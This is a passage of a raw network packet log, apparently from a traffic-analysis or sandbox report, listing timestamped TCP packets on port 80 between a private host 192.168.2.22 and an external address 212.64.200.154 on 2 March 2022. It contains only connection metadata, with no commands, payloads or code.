Mar 2, 2022 16:17:46.490154028 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:46.490170002 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:46.490319014 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:46.582297087 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:46.582324982 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:46.582341909 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:46.582359076 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:46.582381010 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:46.582402945 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:46.582420111 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:46.582480907 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:46.582523108 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:46.582528114 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:46.704058886 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:46.704292059 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:46.724319935 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:46.724351883 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:46.724364996 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:46.724376917 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:46.724623919 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:52.449749947 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:52.449906111 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:53.987524986 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:53.987574100 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:53.987615108 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:53.987654924 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:53.987693071 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:53.987719059 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:53.987757921 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:53.987762928 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:54.001576900 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:54.001660109 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:54.001683950 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:54.001709938 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:54.001710892 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:54.001759052 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:54.033004045 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:54.033108950 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:54.033152103 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:54.033193111 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:54.033231020 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:54.033271074 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:54.033269882 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:54.033310890 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:54.033353090 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:54.033376932 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:54.033384085 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:54.033390045 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:54.033395052 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:54.033418894 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:54.033423901 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:54.328241110 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:54.328294039 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:54.328336000 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:54.328373909 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:54.328375101 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:54.328401089 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:54.328406096 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:54.328413963 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:54.328417063 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:54.328454971 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:54.328463078 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:54.328495979 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:54.328501940 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:54.328536987 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:54.328538895 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:54.328579903 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:54.362046003 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:54.362099886 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:54.362138987 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:54.362179995 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:54.362221003 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:54.362265110 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:54.362277031 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:54.362297058 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:54.362307072 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:54.362338066 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:54.362340927 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:54.362394094 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:54.362407923 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:54.362456083 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:54.362466097 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:54.362523079 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:54.363008022 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:54.408885002 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:54.408963919 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:54.409023046 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:54.409112930 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:54.409154892 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:54.473474979 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:54.473526955 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:54.473567963 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:54.473607063 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:54.473653078 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:54.473691940 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:54.473735094 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:54.473895073 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:54.473938942 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:54.622750044 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:54.622843027 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:54.657941103 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:54.657977104 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:54.658001900 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:54.658025980 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:54.658041954 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:54.658075094 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:54.658090115 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:59.809304953 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:59.809462070 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:02.078447104 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:02.078517914 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:02.078633070 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:02.080118895 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:02.096312046 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:02.096494913 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:02.096535921 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:02.096561909 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:02.096585989 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:02.096606970 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:02.096612930 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:02.096616983 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:02.096638918 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:02.096651077 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:02.096657038 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:02.096666098 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:02.096683979 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:02.096700907 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:02.096719027 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:02.096724987 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:02.096746922 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:02.096762896 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:02.096786976 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:02.096796989 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:02.096810102 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:02.096827030 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:02.097219944 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:02.112051010 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:02.112159014 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:02.112221003 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:02.112258911 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:02.112294912 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:02.112299919 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:02.352114916 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:02.352154970 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:02.352175951 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:02.352199078 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:02.352217913 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:02.352248907 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:02.352272987 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:02.352293968 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:02.353048086 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:02.394309044 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:02.394388914 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:02.394437075 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:02.394474030 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:02.394484043 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:02.394509077 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:02.394520998 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:02.394526005 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:02.394547939 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:02.394548893 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:02.394588947 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:02.394591093 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:02.394639969 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:02.409991980 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:02.410032034 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:02.410202026 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:02.456867933 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:02.456969023 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:02.457026005 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:02.462670088 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:02.462750912 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:02.504669905 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:02.504719019 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:02.504744053 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:02.504769087 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:02.504793882 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:02.504820108 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:02.504825115 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:02.504863024 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:02.504868031 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:02.504870892 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:02.504908085 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:02.619867086 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:02.620064020 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:02.659775972 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:02.659822941 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:02.659879923 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:02.659931898 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:02.660015106 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:02.660058975 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:07.139558077 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:07.139637947 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:09.330619097 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:09.330684900 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:09.330876112 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:09.334762096 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:09.334819078 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:09.334872961 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:09.334928989 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:09.334940910 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:09.334965944 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:09.334990978 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:09.335006952 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:09.335052013 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:09.335073948 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:09.335114956 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:09.335122108 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:09.335191011 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:09.351063013 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:09.351214886 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:09.351306915 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:09.351399899 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:09.363451004 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:09.364855051 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:09.364979982 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:09.364995956 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:09.365039110 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:09.365047932 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:09.365113974 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:09.648521900 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:09.648582935 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:09.648641109 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:09.648700953 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:09.648730993 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:09.648755074 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:09.648772001 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:09.648809910 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:09.648827076 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:09.648863077 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:09.648866892 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:09.648916960 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:09.648931026 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:09.648978949 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:09.706818104 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:09.706901073 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:09.706958055 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:09.706998110 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:09.707015991 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:09.707048893 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:09.707067966 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:09.707075119 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:09.707114935 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:09.707130909 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:09.707173109 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:09.707185984 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:09.707226992 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:09.726300001 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:09.726331949 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:09.726438999 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:09.786109924 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:09.786164045 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:09.786205053 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:09.786376953 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:09.903500080 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:09.903568029 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:09.903628111 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:09.903669119 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:09.903723955 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:09.903753042 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:09.903788090 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:09.903798103 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:09.903803110 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:09.903851986 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:09.903857946 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:09.903928995 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:10.019320011 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:10.019601107 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:10.052648067 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:10.052680016 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:10.052701950 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:10.052721977 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:10.052814960 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:10.052860022 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:14.561971903 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:14.562150002 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:15.957959890 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:15.957988977 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:15.958007097 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:15.958112001 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:15.958121061 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:15.958132982 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:15.958162069 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:15.958165884 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:15.958184004 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:15.958204031 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:15.958206892 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:15.958213091 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:15.958225012 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:15.958244085 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:15.958249092 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:15.958395958 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:15.959814072 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:15.971136093 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:15.971163034 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:15.971201897 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:15.971220970 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:15.971236944 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:15.971256971 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:15.971286058 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:15.971319914 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:15.971389055 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:15.971431971 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:16.193990946 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:16.194021940 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:16.194039106 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:16.194061041 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:16.194076061 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:16.194077969 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:16.194092989 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:16.194117069 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:16.194139957 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:16.194149017 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:16.194173098 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:16.194230080 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:16.254666090 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:16.254707098 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:16.254729986 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:16.254753113 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:16.254776955 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:16.254798889 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:16.254820108 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:16.255374908 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:16.265252113 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:16.265295029 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:16.265347958 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:16.265379906 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:16.317208052 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:16.317271948 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:16.317277908 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:16.317298889 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:16.317316055 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:16.317329884 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:16.394777060 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:16.394819975 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:16.394844055 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:16.394865990 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:16.394869089 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:16.394892931 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:16.394896984 CET	80	49167	212.64.200.154	192.168.2.22
